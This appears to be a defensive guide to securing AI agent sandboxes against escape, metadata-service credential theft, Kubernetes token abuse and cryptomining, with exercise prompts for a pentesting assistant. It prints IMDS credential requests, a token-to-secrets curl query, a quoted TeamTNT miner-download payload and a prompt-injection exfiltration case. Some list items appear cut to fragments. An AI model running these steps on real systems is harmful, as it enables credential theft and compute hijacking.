In April 2023, security researchers at Wiz disclosed that they had obtained a cross-tenant service account token from within a Hugging Face Spaces container. The token granted read access to private model artifacts belonging to other tenants. The vector was not a kernel exploit — it was an overly permissive IAM role attached to the underlying EC2 instance, reachable from inside any container running on that host via the instance metadata service (IMDS) at 169.254.169.254. The agent workload never needed to escape the container namespace; it simply made an unauthenticated HTTP GET from inside its allowed network context.
Traditional sandboxes confine processes that execute static, known code. AI agent sandboxes must confine processes that generate and execute novel code at runtime — code that the sandbox designer never reviewed. This creates a fundamentally different threat surface. The agent's tool-use loop may invoke shell commands, write files, make outbound network calls, and spawn child processes, all as first-class designed behaviors. The attacker's goal is to chain those permitted behaviors into something the sandbox was not designed to allow.
Sandbox escape in the AI agent context falls into three broad families: namespace escapes (exploiting Linux kernel primitives), metadata service abuse (reaching cloud provider control planes from inside allowed network context), and volume mount exploitation (writing to host-mounted paths). A fourth, increasingly relevant family is agent-driven privilege escalation — where the agent's own tool calls assemble an escape without any single call crossing a policy boundary.
Container runtimes like Docker and containerd isolate workloads using Linux namespaces (PID, NET, MNT, UTS, IPC, USER) and cgroups. Breakouts typically require a privileged capability not stripped at runtime. The most commonly abused:
/proc/sysrq-trigger or use nsenter to re-enter the host namespace. Many AI agent orchestrators grant this for "ease of tool use."
From inside a suspected agent container, run: capsh --print to list current capabilities; check mount | grep proc for overmounted /proc; inspect ls -la /var/run/docker.sock for socket exposure; and attempt curl -s http://169.254.169.254/latest/meta-data/ for IMDS reachability. Any of these returning unexpected output indicates a misconfiguration worth escalating.
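Where capsh is not installed in the container, the same capability check can be made by decoding the CapEff bitmask from /proc/self/status. The following is a minimal sketch: the bit numbers follow the Linux capability header, but the selection of capabilities treated as risky, the function name, and the two sample masks are assumptions made for illustration.

```python
# Bit numbers follow linux/capability.h. Which capabilities count as
# "risky" is an assumption of this sketch, not an exhaustive list.
RISKY_CAPS = {
    2: "CAP_DAC_READ_SEARCH",
    12: "CAP_NET_ADMIN",
    16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}


def risky_caps_from_status(status_text: str) -> list[str]:
    """Return the risky capabilities set in the CapEff line of a status file."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            mask = int(line.split(":", 1)[1].strip(), 16)
            return [
                name
                for bit, name in sorted(RISKY_CAPS.items())
                if (mask >> bit) & 1
            ]
    raise ValueError("no CapEff line found")


# Illustrative inputs: a typical Docker default mask and a privileged one.
DOCKER_DEFAULT = "Name:\tpython3\nCapEff:\t00000000a80425fb\n"
PRIVILEGED = "Name:\tpython3\nCapEff:\t0000003fffffffff\n"
```

On a live target the input would be the contents of /proc/self/status; an empty result means none of the listed capabilities is in the effective set.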
The Hugging Face incident illustrates the canonical IMDS attack path. The instance metadata service runs on a link-local address reachable from any process on the EC2 instance, including containers running on it, unless the operator has configured IMDSv2 (which requires a PUT before GET, making it harder to reach from SSRF vectors) and blocked the address at the container network level.
An agent with any outbound HTTP tool capability can silently reach the IMDS and retrieve the instance role credentials in a single tool call. Those credentials may have permissions extending far beyond the agent's intended scope — S3 buckets, Secrets Manager entries, or even IAM privilege escalation paths.
# Tool call the agent makes (appears legitimate)
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Response reveals role name, then:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# Returns:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2023-04-14T18:29:00Z"
}
IMDSv2 alone is insufficient if agents have unrestricted outbound HTTP. The PUT-before-GET requirement stops SSRF-style reaches but not direct tool calls. Network-level blocking of 169.254.169.254 at the container network interface is required. AWS recommends restricting instance profiles to least-privilege and enabling IMDSv2 hop limit of 1 to prevent container-level access.
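Network-level blocking can be complemented by a check inside the agent's HTTP tool itself. The sketch below refuses URLs whose host is, or resolves to, a link-local or known metadata address. The function names, the deny-list contents, and the injectable resolver are assumptions for illustration; this is a defense-in-depth layer, not a replacement for the network rule, since it does not cover redirects or DNS answers that change between check and use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical deny-list; extend it for the providers you actually run on.
METADATA_HOSTS = {"metadata.google.internal"}
EXTRA_BLOCKED = {ipaddress.ip_address("fd00:ec2::254")}  # AWS IMDS over IPv6


def resolve_all(host: str) -> list[str]:
    """Default resolver: every address the hostname currently maps to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_metadata_destination(url: str, resolver=resolve_all) -> bool:
    """Return True if the agent's HTTP tool should refuse this URL."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if not host or host in METADATA_HOSTS:
        return True  # fail closed on unparseable URLs and known hostnames
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        # Not an IP literal: resolve it and inspect every answer.
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError):
            return True  # fail closed when resolution fails
    return any(a.is_link_local or a in EXTRA_BLOCKED for a in addresses)
```

The resolver parameter exists so the check can be exercised without real DNS; in production the default resolver would be used and the connection should be made to the address that was checked.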
CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski and disclosed in February 2019, demonstrated that a malicious container could overwrite the host runc binary by abusing a file descriptor to it (reached through /proc/self/exe) that was open during container execution. The technique required the attacker to control code executing inside the container, which is exactly the position an AI agent code-execution tool grants. Patched runc versions closed this specific hole, but the architectural lesson persists: any code executing inside a container can observe and interact with the host runtime's filesystem operations if the runtime itself runs as root without additional namespace isolation.
Subsequent variants (CVE-2021-30465 for runc mount handling, CVE-2022-0492 for cgroup v1 release_agent) each exploited the same principle: the boundary between container and host is enforced by software, namely the container runtime and the kernel's own namespace and cgroup code, running on a shared kernel. Any bug in that software, or any excessive capability granted to the container, collapses the boundary.
When assessing an AI agent deployment for sandbox escape risk, the methodology follows four phases:
capsh --print, /proc/self/status (CapEff field), and checking --security-opt flags in the orchestration configuration.
CVE-2022-0492 (CVSS 7.8): A flaw in Linux kernel cgroup v1 release_agent handling allowed an unprivileged user inside a container to escape if the container had CAP_SYS_ADMIN or if user namespaces were misconfigured. This remained unpatched in many cloud provider managed Kubernetes node images for over three months after disclosure. AI agent workloads on those node versions were trivially escapable if the agent could execute shell commands.
You are a pentester who has achieved code execution inside an AI agent container. Your task is to enumerate the escape surface: capabilities, mounts, network reach, and runtime version. The AI assistant will guide you through the recon process, explain what each finding means, and help you prioritize which vectors are worth escalating.
The Capital One breach, carried out by Paige Thompson in March 2019 and disclosed that July, is the canonical SSRF-to-IMDS attack case. Thompson exploited a misconfigured WAF running on an EC2 instance, used server-side request forgery to reach 169.254.169.254, retrieved an IAM role credential with broad S3 permissions, and exfiltrated approximately 100 million customer records. While not an AI agent attack, the technique is directly applicable to any agent with an HTTP fetch tool and network access to IMDS. The underlying weakness (no IMDSv2 enforcement, an overly permissive instance role) remains common in AI agent deployments today.
Every major cloud provider exposes an instance metadata service reachable from the instance (and its containers) on a well-known link-local address. AWS uses 169.254.169.254; Azure uses the same address for its Instance Metadata Service (DHCP, DNS, and health probes are served separately from 168.63.129.16); GCP uses metadata.google.internal, which resolves to 169.254.169.254. None of the three authenticates the caller: any process in the instance's network namespace that sends a correctly formed request can obtain instance credentials.
An AI agent with any HTTP tool — including tools framed as "web browsing," "URL fetcher," "API caller," or "research assistant" — can reach these endpoints. Unlike a human-operated SSRF, the agent may have been instructed by a malicious prompt to make exactly this request while performing an apparently legitimate task.
| Provider | Endpoint | Credential Path | Default Protection |
|---|---|---|---|
| AWS | 169.254.169.254 | /latest/meta-data/iam/security-credentials/<role> | IMDSv2 (opt-in until 2024); hop-limit 1 |
| Azure | 169.254.169.254 | /metadata/identity/oauth2/token?api-version=2018-02-01&resource=<resource-uri> + Metadata: true header | Required header; stops basic SSRF but not tool calls |
| GCP | metadata.google.internal | /computeMetadata/v1/instance/service-accounts/default/token | Required header: Metadata-Flavor: Google |
Azure and GCP require a custom header (Metadata: true and Metadata-Flavor: Google respectively). This stops classic SSRF via image tags or redirects, but does NOT stop an AI agent whose HTTP tool can set arbitrary headers. Pentesters must test with full header control, not just bare GET requests.
Credentials are the most targeted IMDS output, but the endpoint exposes significantly more information useful for lateral movement and escalation:
/latest/user-data with no additional authentication.
/latest/meta-data/public-keys/. Knowing the key name and fingerprint narrows the attack surface for lateral SSH movement.
When AI agents run inside Kubernetes pods, a different credential source becomes relevant: the service account token automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. This JWT can be used to authenticate to the Kubernetes API server.
The Azurescape vulnerability (publicly disclosed by Palo Alto Networks Unit 42 in September 2021; the initial container escape relied on CVE-2019-5736 in an outdated runc) demonstrated that cross-tenant Kubernetes API access was possible from within a compromised pod in Azure Container Instances. An agent capable of reading its own filesystem can exfiltrate the service account token in a single file read operation.
# Agent reads its own service account token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Then queries the K8s API with it:
curl --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets
# If the service account has get/list on secrets:
# All secrets in the namespace are now exposed
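Before querying the API server, it helps to know which identity the mounted token represents. A service account token is a JWT, so its claims can be read without verifying the signature. The sketch below decodes the payload and returns the subject; the function names are hypothetical, and it assumes the usual subject format system:serviceaccount:<namespace>:<name>.

```python
import base64
import json


def decode_jwt_claims(token: str) -> dict:
    """Decode the payload segment of a JWT without verifying its signature."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def service_account_identity(token: str) -> str:
    """Return the 'sub' claim, e.g. system:serviceaccount:<namespace>:<name>."""
    return decode_jwt_claims(token)["sub"]
```

During an assessment the token string would come from the mounted file; the namespace in the subject tells the tester which namespace to query first.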
The most common Kubernetes RBAC misconfiguration seen in AI agent deployments is granting the agent's service account cluster-admin or wildcard resource access so that the agent can "manage Kubernetes resources as a tool." This gives the agent — and any attacker who controls the agent — full cluster access from within a single pod.
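This misconfiguration is easy to check mechanically once a Role or ClusterRole manifest has been loaded into a dictionary. The following sketch flags wildcard grants and read access to secrets. The function name and the wording of the findings are assumptions; a fuller audit would also follow the bindings that attach the role to the agent's service account.

```python
READ_VERBS = {"get", "list", "watch", "*"}


def overbroad_rules(role: dict) -> list[str]:
    """Describe rules in a Role or ClusterRole manifest that grant too much."""
    findings = []
    for index, rule in enumerate(role.get("rules", [])):
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if "*" in resources or "*" in verbs:
            findings.append(f"rule {index}: wildcard resources or verbs")
        elif "secrets" in resources and verbs & READ_VERBS:
            findings.append(f"rule {index}: read access to secrets")
    return findings


# Illustrative manifests, already parsed from YAML or JSON.
WILDCARD_ROLE = {"rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]}
SCOPED_ROLE = {"rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]}]}
```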
Once credentials are obtained, the agent's existing tool suite becomes the exfiltration mechanism. An agent with file-write and HTTP-post tools can write credentials to disk, construct a signed AWS API request, and exfiltrate data without invoking any capability outside its normal operation profile. This is why behavioral detection — anomaly detection on tool call sequences — is more reliable than any single policy check.
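A sequence-based detector of this kind can be sketched in a few lines. The example flags a session in which the agent touches a credential source and later posts to a host outside an allow-list. The tool names, the marker strings, and the allow-listed host are all hypothetical; a real deployment would derive them from its own tool schema and baseline.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hypothetical markers for credential sources and a hypothetical allow-list.
SENSITIVE_MARKERS = ("169.254.169.254", "/var/run/secrets/", ".aws/credentials", ".env")
ALLOWED_POST_HOSTS = {"api.internal.example"}


@dataclass
class ToolCall:
    tool: str    # e.g. "http_get", "file_read", "http_post"
    target: str  # URL or filesystem path


def credential_then_egress(calls: list[ToolCall]) -> bool:
    """True if a credential source is accessed and an untrusted POST follows."""
    touched_secret = False
    for call in calls:
        if any(marker in call.target for marker in SENSITIVE_MARKERS):
            touched_secret = True
        elif call.tool == "http_post" and touched_secret:
            if urlsplit(call.target).hostname not in ALLOWED_POST_HOSTS:
                return True
    return False
```

Neither call is suspicious in isolation, which is the point: the signal is the ordering, so the detector has to keep state across the session.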
The 2024 PromptArmor research on indirect prompt injection demonstrated live exfiltration from a GPT-4-powered assistant: a malicious document caused the agent to silently POST its conversation history (which included retrieved credentials) to an attacker-controlled endpoint using the agent's own web request tool. The agent reported success on the original task. No error was raised. The exfiltration was invisible in the response.
When testing an AI agent for credential theft risk: (1) Determine whether the agent has any HTTP fetch capability. (2) Check whether 169.254.169.254 is reachable from the agent's network namespace. (3) Attempt a direct IMDS GET as a tool call. (4) Check /var/run/secrets/ for K8s service account tokens. (5) Read any .env, .aws/credentials, or application config files in the agent's working directory. Document all findings — the goal is a complete picture of every credential the agent could access, not just the most obvious one.
You are assessing an AI agent deployed on AWS EKS (Elastic Kubernetes Service). The agent has a web-browsing tool and file-read capabilities. Your goal is to enumerate all credential sources it can access and assess the blast radius of each. The assistant will help you construct test cases and interpret what you find.
TeamTNT, tracked by Trend Micro and Cado Security from 2020 onward, specialized in targeting misconfigured container infrastructure for cryptomining. Their technique: scan for exposed Docker daemons (port 2375/2376), deploy XMRig or similar Monero miners, and in later campaigns, specifically target Jupyter notebook servers, an early form of AI/ML compute abuse. By 2021 their tooling included credential harvesters targeting AWS credential files (~/.aws/credentials) and Kubernetes config files. The same infrastructure used to run ML experiments was repurposed for mining within minutes of compromise. Container CPU quotas that should have limited blast radius were absent in the majority of compromised targets.
AI agent infrastructure is particularly attractive for resource abuse because it is designed to consume significant compute. Anomalous CPU or memory usage from a cryptominer is easy to spot on a web server, but it blends in with an AI inference workload. Network egress that would trigger alerts on a standard application server is routine for an agent making API calls and fetching external data. This camouflage effect makes AI agent infrastructure a high-value target for attacker-controlled workload injection.
Resource abuse falls into four categories in the AI agent context:
Jupyter notebook servers, commonly used to develop and test AI agents, are a documented cryptomining target. Exposed notebooks (no authentication, or with predictable tokens) allow attackers to execute arbitrary Python, which trivially includes subprocess calls to download and run XMRig. The 2020 Aqua Security threat intelligence report documented over 13,000 exposed Jupyter instances and observed cryptomining injection within minutes of exposure for honeypot instances.
The pattern extends to any AI agent framework that exposes a code execution endpoint: LangChain's local server mode, AutoGPT instances with a web interface, and custom agent APIs that allow code submission. Any endpoint that accepts and executes code without authentication is a cryptomining substrate.
# Typical TeamTNT payload delivered via exposed Jupyter notebook:
import subprocess
subprocess.Popen([
'wget', '-q',
'http://[C2-IP]/xmrig',
'-O', '/tmp/.cache/xmrig'
])
subprocess.Popen(['chmod', '+x', '/tmp/.cache/xmrig'])
subprocess.Popen([
'/tmp/.cache/xmrig',
'--algo', 'rx/0',
'-o', 'pool.supportxmr.com:3333',
'--threads', '8' # Consumes all available CPU
])
XMRig and similar miners generate distinctive network signatures: outbound connections to mining pool hostnames (pool.supportxmr.com, xmrpool.eu, etc.) or pool IPs on ports 3333, 5555, or 4444; Stratum protocol traffic; and sustained high CPU with low memory I/O ratio. AI agent monitoring should include outbound connection destination analysis, not just HTTP content inspection.
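These signatures can be combined into a simple connection classifier. The sketch below uses the ports and pool hostnames named above; the function name, the indicator labels, and the handshake heuristic (looking for a JSON-RPC login or mining.* method in the first bytes sent) are simplifying assumptions. A port match alone is weak evidence and should be weighed with the other indicators.

```python
MINING_PORTS = {3333, 4444, 5555}
POOL_DOMAINS = ("supportxmr.com", "xmrpool.eu")


def mining_indicators(host: str, port: int, first_bytes: bytes = b"") -> list[str]:
    """List which mining signatures an outbound connection matches."""
    host = host.lower().rstrip(".")
    indicators = []
    if any(host == d or host.endswith("." + d) for d in POOL_DOMAINS):
        indicators.append("pool-hostname")
    if port in MINING_PORTS:
        indicators.append("pool-port")
    # Stratum is JSON-RPC over TCP; miners open with a login or mining.* call.
    if b'"method"' in first_bytes and (
        b'"login"' in first_bytes or b"mining." in first_bytes
    ):
        indicators.append("stratum-handshake")
    return indicators
```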
An AI agent's outbound network access is granted for legitimate purposes: fetching URLs, calling APIs, sending notifications. An attacker who controls the agent's prompt can redirect this egress capability. The OWASP Top 10 for LLM Applications lists "Excessive Agency" (LLM08 in the 2023 edition, LLM06 in the 2025 edition): the condition where an agent has more network, compute, or storage access than its task requires. That excess access is directly exploitable for network abuse.
Port scanning from agent infrastructure is particularly damaging because: (1) the agent's IP has a clean reputation, (2) scan traffic appears as normal outbound from a legitimate cloud customer, and (3) the agent can distribute scans across many target IPs in what appears to be routine API calls or URL fetches. This technique has been observed in post-compromise scenarios where compromised CI/CD agents with broad network access were used to scan internal network ranges.
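Because each individual request looks routine, scanning is easier to catch as fan-out: the number of distinct destinations an agent contacts within a short window. The class below is a minimal sketch with hypothetical names and thresholds, and it assumes timestamps arrive in non-decreasing order.

```python
from collections import deque


class FanOutDetector:
    """Flags an agent that contacts too many distinct destinations in a window."""

    def __init__(self, window_seconds: float = 60.0, max_distinct: int = 50):
        self.window_seconds = window_seconds
        self.max_distinct = max_distinct
        self._events = deque()  # (timestamp, destination) pairs, oldest first

    def observe(self, timestamp: float, destination: str) -> bool:
        """Record one outbound connection; return True if fan-out is excessive."""
        self._events.append((timestamp, destination))
        cutoff = timestamp - self.window_seconds
        # Drop events that have aged out of the sliding window.
        while self._events and self._events[0][0] <= cutoff:
            self._events.popleft()
        distinct = {dest for _, dest in self._events}
        return len(distinct) > self.max_distinct
```

The threshold should come from the agent's measured baseline; a research agent legitimately contacts far more hosts than a ticket-triage agent.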
A category unique to AI agent systems: an attacker who can influence the agent's behavior (via prompt injection, malicious tool outputs, or direct API access) can cause it to issue massive numbers of LLM API calls. This does not require code execution — it requires only the ability to cause the agent to enter a loop or process an arbitrarily large input.
Sponge examples, described by Shumailov et al. (2021), demonstrate that inputs can be crafted to maximize the energy and latency cost of neural network inference, including for language models. Applied to an agentic system, a crafted document could cause an agent to spend minutes of inference time per document, exhaust its API quota, and either fail its primary task or generate costs that exceed any expected budget.
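One inexpensive mitigation is a per-task budget enforced in the agent loop before each model call. The sketch below is an assumption about how such a guard might look; the class names and limits are hypothetical, and the token figure is whatever estimate the caller can produce before sending the request.

```python
class BudgetExceeded(RuntimeError):
    """Raised when a task would exceed its LLM call or token allowance."""


class TaskBudget:
    """Caps the number of LLM calls and total tokens a single task may use."""

    def __init__(self, max_calls: int, max_tokens: int):
        self.max_calls = max_calls
        self.max_tokens = max_tokens
        self.calls = 0
        self.tokens = 0

    def charge(self, estimated_tokens: int) -> None:
        """Reserve one call; raise before the request is sent if over budget."""
        if self.calls + 1 > self.max_calls:
            raise BudgetExceeded("call limit reached")
        if self.tokens + estimated_tokens > self.max_tokens:
            raise BudgetExceeded("token limit reached")
        self.calls += 1
        self.tokens += estimated_tokens
```

Raising before the request is sent means a looping or sponge-fed agent fails its task visibly instead of silently accumulating cost.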
AWS charges accrue continuously, but billing data and the alarms built on it lag actual usage by hours. A misconfigured AI agent with no spending controls that is hijacked for cryptomining or caused to make excessive API calls can generate thousands of dollars in charges before automated billing alerts fire. Organizations running AI agents on cloud infrastructure should set budgets with automated actions (AWS offers no native hard spending cap), configure CloudWatch billing alarms, and consider AWS Cost Anomaly Detection as an early warning mechanism.
Distinguishing resource abuse from normal AI agent behavior requires baseline-relative analysis. A well-instrumented agent deployment should capture:
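Baseline-relative analysis can be illustrated with a robust outlier score. The sketch below compares one observation against a window of normal readings using the median and the median absolute deviation, which tolerate occasional spikes in the baseline better than mean and standard deviation. The function names and the 3.5 threshold are assumptions; the metric could be CPU percent, egress bytes, or tool calls per minute.

```python
import statistics


def modified_z_score(baseline: list[float], observed: float) -> float:
    """Score an observation against a baseline using median and MAD."""
    median = statistics.median(baseline)
    mad = statistics.median([abs(x - median) for x in baseline])
    if mad == 0:
        # A perfectly flat baseline: any deviation at all is an outlier.
        return 0.0 if observed == median else float("inf")
    return 0.6745 * (observed - median) / mad


def is_anomalous(baseline: list[float], observed: float, threshold: float = 3.5) -> bool:
    """True if the observation deviates from the baseline beyond the threshold."""
    return abs(modified_z_score(baseline, observed)) > threshold
```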
You are reviewing monitoring data from an AI agent fleet and have noticed anomalies. Your task is to analyze the telemetry, determine whether resource abuse is occurring, identify the abuse type, and recommend containment steps. The assistant will help you interpret signals and construct detection rules.
At AWS re:Inforce 2023, the Amazon security team presented their internal approach to containing agentic workloads: a cell-based architecture where each agent instance runs in a dedicated Firecracker microVM with no shared kernel, no shared instance, and no IMDS access. Firecracker, the same virtual machine monitor underlying AWS Lambda, gives each workload its own guest kernel behind a hardware virtualization boundary rather than relying on namespace-level isolation. The escape surface is reduced to hypervisor vulnerabilities rather than container runtime vulnerabilities. The practical cost: ~125ms cold start latency per agent invocation. For most enterprise agent deployments, this is acceptable. For real-time interactive agents, it requires architectural adjustments.
No single control eliminates sandbox escape risk. The goal is to increase the number of controls an attacker must bypass, reduce the blast radius when one layer fails, and ensure that detection can identify the failure before full compromise occurs. The following framework organizes controls from innermost (agent process) to outermost (cloud account):
| Layer | Control | Threat Addressed | Implementation |
|---|---|---|---|
| Process | Drop all capabilities; use seccomp default-deny | Kernel namespace escape via CAP_SYS_ADMIN and siblings | --cap-drop=ALL --security-opt seccomp=profile.json |
| Container | Read-only root filesystem; tmpfs for /tmp | Malware staging in container filesystem | --read-only --tmpfs /tmp:size=50m |
| Runtime | gVisor (runsc) or Firecracker isolation | runc CVEs and shared kernel exploitation | runtimeClassName: gvisor in Kubernetes pod spec |
| Network | Block 169.254.169.254 at CNI level; allow-list egress | IMDS credential theft | NetworkPolicy or iptables rule pre-container start |
| Identity | Dedicated least-privilege service account; no cluster-admin | K8s API abuse via service account token | RBAC with explicit verb/resource grants only |
| Account | Hard spending limits; Cost Anomaly Detection; separate billing account | LLM API cost abuse; compute hijacking | AWS Budgets; GCP quota limits; Azure cost alerts |
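The Process and Container rows of the table translate directly into a docker run invocation. The helper below is a sketch that assembles the argument list for use with subprocess; the function name and image name are hypothetical, the seccomp profile path is the placeholder from the table, and the no-new-privileges and noexec options are additions assumed here rather than taken from the table.

```python
def hardened_run_args(image: str, seccomp_profile: str = "profile.json") -> list[str]:
    """Build a docker run command line applying the process and container controls."""
    return [
        "docker", "run", "--rm",
        "--cap-drop=ALL",                             # drop every capability
        "--security-opt", f"seccomp={seccomp_profile}",
        "--security-opt", "no-new-privileges",        # assumption: block setuid gains
        "--read-only",                                # read-only root filesystem
        "--tmpfs", "/tmp:rw,noexec,nosuid,size=50m",  # scratch space, not executable
        image,
    ]
```

Passing the list to subprocess.run avoids shell quoting issues and makes it easy to assert in tests that no orchestration path ever adds --privileged.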
Google's gVisor (open-sourced 2018) interposes a user-space kernel between container processes and the host Linux kernel. Container syscalls are handled by the Sentry (gVisor's kernel implementation) rather than passed directly to the host. This means that the container cannot reach host kernel vulnerabilities directly — it must first compromise the Sentry.
Google Cloud's GKE Sandbox uses gVisor for untrusted workloads. The GKE documentation explicitly recommends it for "workloads that execute untrusted code" — a description that accurately characterizes any AI agent that executes LLM-generated code. The performance overhead is approximately 10–20% for typical workloads, increasing for syscall-intensive operations.
gVisor does not prevent IMDS access (it operates at the syscall level, not the network level), and does not prevent a container from using its permitted network access to reach internal services. It is a kernel isolation control, not a network isolation control.
Blocking IMDS at the network level is the most reliable protection against credential theft via metadata service. The implementation depends on the deployment environment:
iptables -I DOCKER-USER -d 169.254.169.254 -j DROP before starting agent containers. This rule persists across container restarts but must be applied to each host.
aws ec2 describe-instances --query 'Reservations[].Instances[].MetadataOptions'.
IMDSv2 requires a PUT request to obtain a session token before GETs are accepted. The instance metadata hop limit sets the IP TTL on the response to that PUT. With a hop limit of 1 (the default for new instances), the response carrying the token expires after a single network hop. A container on a bridged network sits one hop further away than a host process, so the token response is dropped before it reaches the container, and without a token no IMDSv2 GET succeeds. Processes on the host itself are unaffected. Containers that share the host network namespace are also unaffected, so the hop limit offers no protection against them.
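The MetadataOptions returned by describe-instances can be audited automatically. The sketch below takes one instance record as a dictionary and reports the two settings that matter here; the field names HttpEndpoint, HttpTokens, and HttpPutResponseHopLimit are those of the EC2 API, while the function name and the wording of the findings are assumptions.

```python
def imds_findings(instance: dict) -> list[str]:
    """Report IMDS settings on one EC2 instance record that weaken isolation."""
    options = instance.get("MetadataOptions", {})
    findings = []
    if options.get("HttpEndpoint", "enabled") != "enabled":
        return findings  # metadata service is switched off entirely
    if options.get("HttpTokens") != "required":
        findings.append("IMDSv1 still accepted (HttpTokens is not 'required')")
    if options.get("HttpPutResponseHopLimit", 1) > 1:
        findings.append("hop limit above 1 lets bridged containers obtain tokens")
    return findings
```

Running this over every instance in the account gives a quick list of hosts where a container-level IMDS block is the only remaining control.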
Cgroup-based resource limits are a necessary but insufficient control against resource abuse. A container CPU limit of 0.5 cores prevents a miner from consuming all host CPU, but the miner still runs, generates costs, and produces external network signatures. Resource limits should be set at realistic values based on measured normal agent behavior, not arbitrary defaults. Limits set too high provide no meaningful protection; limits set too low cause legitimate agent task failures.
In Kubernetes, resource limits should be set in the pod spec for both requests and limits. Requests affect scheduling; limits affect cgroup enforcement. For AI agent pods, set CPU limits based on 95th percentile observed inference CPU, and memory limits based on maximum expected context size plus a 20% buffer.
# Kubernetes resource limits for AI agent pod
resources:
  requests:
    cpu: "500m"
    memory: "1Gi"
  limits:
    cpu: "2000m"              # 2 cores max; limits miner impact
    memory: "4Gi"             # Prevents memory-based DoS
    ephemeral-storage: "1Gi"  # Prevents storage abuse
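The sizing rule described above (95th percentile CPU, peak memory plus a 20% buffer) can be computed from monitoring samples. The following sketch uses a nearest-rank percentile and integer arithmetic to avoid rounding surprises. The function names and the sample units (millicores and MiB) are assumptions, and peak observed memory stands in here for maximum expected context size.

```python
def nearest_rank_percentile(samples: list[int], percent: int) -> int:
    """Nearest-rank percentile of integer samples (percent between 1 and 100)."""
    ordered = sorted(samples)
    rank = max(1, (percent * len(ordered) + 99) // 100)  # integer ceiling
    return ordered[rank - 1]


def suggest_limits(cpu_millicores: list[int], memory_mib: list[int],
                   buffer_percent: int = 20) -> dict[str, str]:
    """Suggest Kubernetes limits from observed CPU and memory samples."""
    cpu = nearest_rank_percentile(cpu_millicores, 95)
    peak = max(memory_mib)
    memory = (peak * (100 + buffer_percent) + 99) // 100  # peak plus buffer, rounded up
    return {"cpu": f"{cpu}m", "memory": f"{memory}Mi"}
```

The returned strings use the same quantity format as the pod spec, so they can be dropped into the limits section after review.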
Falco (CNCF, originally from Sysdig) uses eBPF to observe kernel syscalls and generate alerts on anomalous behavior. For AI agent sandboxes, the most valuable Falco rules are those that detect: unexpected process spawning from the agent runtime, outbound connections to unexpected destinations, writes to executable paths outside expected working directories, and attempts to read sensitive filesystem paths like /proc/self/mem or service account tokens.
In 2022, the Sysdig Threat Research Team documented a Falco rule set specifically targeting cryptominer behavior: detection of processes whose binary names or hashes match known miners, and detection of connections to mining pool hostnames extracted from public threat intelligence feeds. These rules are evaluated on kernel-level events with low performance overhead, and a process confined to the container cannot disable them.
After implementing defenses, validate with the following tests: (1) Attempt an IMDS GET from inside the agent container: it should fail with connection refused or a timeout. (2) Attempt to read /var/run/secrets/: verify the mount is absent or the service account token has minimal RBAC. (3) Run capsh --print and read the CapEff field of /proc/self/status: verify that no dangerous capabilities are present. (4) Attempt to spawn a process outside the expected agent runtime: verify Falco generates an alert. (5) Attempt to write an executable to /tmp: verify it is either blocked (read-only filesystem) or immediately detected. Document pass/fail for each test with evidence.
A service mesh (Istio, Linkerd) provides mutual TLS between services and allows policy-based enforcement of which agent pods can communicate with which internal services. This adds an authentication layer that is independent of network-level IP allow-lists. Even if an agent escapes its container namespace, the service mesh sidecar still enforces identity-based policy: an escaped process that does not hold the workload certificate cannot authenticate to other services.
Zero-trust networking for AI agents means: no agent can call any internal service by default. Each inter-service communication requires an explicit policy grant. This is operationally demanding but dramatically reduces the blast radius of any single agent compromise.
Your organization is deploying a LangChain-based AI agent on AWS EKS. The agent has web-browsing, file-read, shell-execution, and external API call tools. You need to design the complete security configuration: container hardening, network controls, RBAC, runtime isolation, and detection. The assistant will review your proposed configurations and identify gaps.